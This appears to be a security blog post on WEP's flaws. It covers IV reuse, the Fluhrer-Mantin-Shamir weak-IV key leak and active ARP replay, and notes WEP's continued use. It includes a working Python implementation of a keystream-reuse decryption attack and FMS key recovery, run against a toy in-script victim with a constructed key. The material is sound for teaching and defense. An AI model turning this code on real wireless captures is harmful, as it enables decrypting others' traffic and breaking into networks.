Diving into Wireless Network Threats – Weaknesses in WEP

As I mentioned in my earlier blog post, I will be writing about various threats to mobile devices. To start off, I’m going to delve into the attacks on the environments that they operate in, namely the wireless networks found in businesses and homes. Just what are the possible ways that an attacker could observe or manipulate users and devices?

In order to explore the world of wireless network security, let's talk first about the Wired Equivalent Privacy (WEP) protocol. Of course, every security professional worth their salt knows that WEP is not effective for establishing a secure wireless network. Unfortunately, there's no way to tell how employees set up their home networks, and it's debatable whether those networks are secure at all. When you think about members of your organization with access to sensitive data, data that could be profitable in the hands of unscrupulous competitors and investors, are you sure they're not using WEP at home?

Of course not; we simply must assume they are not following best practices. It's quite possible that they configured their wireless router some time ago and have never updated it since. What about networks that are under the direct control of the business? There, WEP should be all but extinct. Unfortunately, it's not. In 2013, Information Week found that 15% of business networks continue to use WEP, which I think is surprisingly high given how long it's been considered insecure.

WEP emerged circa 1999, and it wasn't long before researchers identified serious flaws; the best known is the 2001 paper by Fluhrer, Mantin and Shamir showing that the way WEP feeds the IV and key into RC4 leaks individual key bytes. Subsequent flaws (as well as poor implementations of WEP in various products) led to even more devastating attacks, and to steady improvements in the tools used to carry them out.

One of the critical weaknesses in WEP lies in how it handles initialization vectors (IVs). An IV is a per-packet value combined with the encryption key so that the same key does not produce the same keystream for every packet; WEP simply prepends it to the key to form the seed for its stream cipher, RC4. The WEP IV is only 24 bits long and is transmitted in the clear, so there are just 2^24 (about 16.7 million) possible values: after that many packets the IVs must repeat, and because many implementations pick IVs at random or reset them to zero on reboot, repeats typically show up far sooner (with random IVs, roughly 5,000 packets give an even chance of a collision). In a secure design the key would be replaced before the IV space is exhausted, but WEP has no mechanism to rekey automatically. Two packets encrypted under the same IV and key share the same RC4 keystream, so XORing the two ciphertexts cancels the keystream and leaves the XOR of the two plaintexts; since every IP frame starts with a predictable LLC/SNAP header, an attacker can recover keystream and decrypt traffic without ever learning the key. Worse, prepending the IV to the key means that certain IV values leak information about individual key bytes through the first byte of keystream, and given enough such packets this makes it possible to deduce the WEP key itself.

Note that this can be done by passively monitoring the network traffic using a wireless card in monitor mode (the 802.11 equivalent of promiscuous mode). Passive monitoring leaves no indication that the access point is under attack, because the attacker isn't doing anything but making copies of the packets. The downside of passive monitoring is that it requires legitimate users on the network to generate the large amount of traffic needed to recover the key. From the perspective of targeting a specific person, the first attacks against WEP were theoretically sound yet still somewhat impractical.

However, the attack methods against WEP improved over the years, cutting the traffic and time requirements dramatically. In addition, through the use of active techniques (with the attacker sending traffic to the target access point, typically by capturing an encrypted ARP request and replaying it so that the access point answers with a fresh IV each time), the time needed to break into a WEP-protected network dropped from days to minutes, making a highly targeted attack very practical. An attacker could simply park in front of your board member's house and gain access to a WEP-protected wireless network with relative ease.

In the past, the process for cracking a WEP key required several tools, including ones for reconnaissance, packet collection, packet injection and cracking the key itself. Today, the tools found in common penetration testing kits are fully automated, with GUIs that make cracking a WEP key as easy as point and click.

The attacks on WEP do not depend on having a massive amount of computing power, and they are not greatly affected by the size of the encryption key: the key is recovered statistically from captured ciphertext rather than by guessing, so a 104-bit key costs only modestly more traffic than a 40-bit one. Nor does the attack depend on how complex the original passphrase was. It's simply a matter of being able to collect enough traffic.
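The IV-collision weakness described earlier and the "just collect enough traffic" point above, as one added example that is not code from the original post. The script below is mine: it implements RC4 as WEP uses it (IV prepended to the key), shows a keystream-reuse attack on two frames that share an IV, and then runs the Fluhrer-Mantin-Shamir weak-IV attack to recover a made-up 40-bit key using nothing but the public IV and the first byte of each captured frame. Everything in it is constructed for illustration: the key `c0ffee1234`, the frame contents, and the `victim_frame` function that stands in for a packet capture. The key-recovery part is the standard FMS procedure, extended to scan for every IV satisfying the "resolved" condition rather than only the classic (A+3, 255, X) family, and to search the top few vote-getters per byte rather than trusting a single winner.

```python
# Added example (mine, not code from the original post): a toy WEP "network"
# with a constructed 40-bit key, plus the two attacks the text describes.
# Frames are 802.11 data payloads, which begin with the LLC/SNAP header every
# IP frame carries: that header is the attacker's known plaintext.  WEP's
# CRC-32 ICV is left out; neither attack needs it.
from collections import Counter

SNAP_HEADER = bytes.fromhex("aaaa030000000800")   # LLC/SNAP + EtherType IPv4
SECRET_KEY = bytes.fromhex("c0ffee1234")           # constructed 40-bit WEP key

def ksa_prefix(key_bytes):
    """RC4 key scheduling for len(key_bytes) steps (256 for the full cipher).
    Stopping early gives the FMS attack what it needs: S and j after only the
    steps driven by the public IV and the key bytes already recovered."""
    S, j = list(range(256)), 0
    for i, k in enumerate(key_bytes):
        j = (j + S[i] + k) % 256
        S[i], S[j] = S[j], S[i]
    return S, j

def rc4_keystream(key, n):
    """First n keystream bytes: full KSA over the key repeated to 256 bytes, then PRGA."""
    S, _ = ksa_prefix([key[i % len(key)] for i in range(256)])
    i, j, out = 0, 0, bytearray()
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return bytes(out)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))   # truncates to the shorter input

def wep_encrypt(key, iv, plaintext):
    """WEP seeds RC4 with IV||key and sends the 3-byte IV in the clear."""
    return iv, xor(plaintext, rc4_keystream(iv + key, len(plaintext)))

# --- Weakness 1: a repeated IV is a repeated keystream (two-time pad) --------
def keystream_reuse_attack(frame_a, frame_b, plaintext_a):
    """C_a xor P_a yields the keystream both frames share, which then strips as
    many bytes off frame b.  Knowing only the 8-byte SNAP header of frame a
    already exposes the first 8 bytes of frame b; the key is never touched."""
    (iv_a, ct_a), (iv_b, ct_b) = frame_a, frame_b
    assert iv_a == iv_b, "attack needs an IV collision"
    return xor(ct_b, xor(ct_a, plaintext_a))

# --- Weakness 2: weak IVs leak key bytes (Fluhrer-Mantin-Shamir attack) -----
def weak_ivs(known, a):
    """IVs with first byte a that leave the state 'resolved' for key index a:
    S[1] < a and S[1] + S[S[1]] == a.  With probability about 5% the remaining
    KSA steps leave those positions alone, and the first keystream byte is then
    exactly the value swapped into S[a] at step a, which depends on key[a]."""
    ivs = []
    for b in range(256):
        for x in range(256):
            iv = bytes([a, b, x])
            S, _ = ksa_prefix(iv + known)
            if S[1] < a and (S[1] + S[S[1]]) % 256 == a:
                ivs.append(iv)
    return ivs

def fms_recover_key(sniff, key_len, width=3):
    """sniff(iv) stands in for capturing a frame the victim sent with that IV.
    Each weak IV casts one vote for key[a] from ciphertext[0] xor 0xAA; the top
    `width` candidates per byte are searched depth-first, and a complete key is
    accepted only if it decrypts a captured frame back to its SNAP header."""
    def search(known):
        if len(known) == key_len:
            iv, ct = sniff(bytes(3))
            return known if xor(ct, rc4_keystream(iv + known, 8)) == SNAP_HEADER else None
        a = 3 + len(known)
        votes = Counter()
        for iv in weak_ivs(known, a):
            _, ct = sniff(iv)
            S, j = ksa_prefix(iv + known)        # state and j just before step a
            first_ks = ct[0] ^ SNAP_HEADER[0]
            # If first_ks is the value swapped into S[a] at step a, then
            # j_a == S.index(first_ks) and key[a] == j_a - j - S[a] (mod 256).
            # The other ~95% of votes land roughly uniformly on wrong values.
            votes[(S.index(first_ks) - j - S[a]) % 256] += 1
        for byte, _ in votes.most_common(width):
            found = search(known + bytes([byte]))
            if found is not None:
                return found
        return None
    return search(b"")

# --- Toy network: every frame the victim sends is encrypted under one key ---
REQUEST = SNAP_HEADER + b"GET /board-minutes.pdf HTTP/1.1\r\n"   # constructed plaintext

def victim_frame(iv, plaintext=REQUEST):
    return wep_encrypt(SECRET_KEY, iv, plaintext)

def demo():
    iv = bytes([0x12, 0x34, 0x56])
    frame_a = victim_frame(iv)                      # attacker knows REQUEST in full
    frame_b = victim_frame(iv, SNAP_HEADER + b"login alice pw Winter13")
    leaked = keystream_reuse_attack(frame_a, frame_b, REQUEST)
    recovered = fms_recover_key(victim_frame, len(SECRET_KEY))
    return leaked, recovered
```

`demo()` takes a few seconds, almost all of it in the IV scan. Two things are worth noticing: the keystream-reuse attack never touches the key at all, and the key recovery consumes only the public IV and one ciphertext byte per frame, so neither the key length nor the quality of the passphrase it was derived from enters into the work required; a 104-bit key just means eight more rounds of the same voting.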

Once it became apparent that WEP had fatal, unfixable flaws, there were immediate efforts to develop a successor. Because a replacement was needed quickly, an interim standard called Wi-Fi Protected Access (WPA) was published in 2003, running on existing hardware with TKIP as a patch over RC4; WPA2, based on the full IEEE 802.11i standard with AES-CCMP, followed in 2004. With more secure alternatives on the market for over nine years, you would expect WEP to be all but extinct, but sadly that's not the case. WEP remains in use in far too many places.

In the next blog post, we will take a look at WEP's successors, WPA and WPA2, and at the techniques used to recover those keys.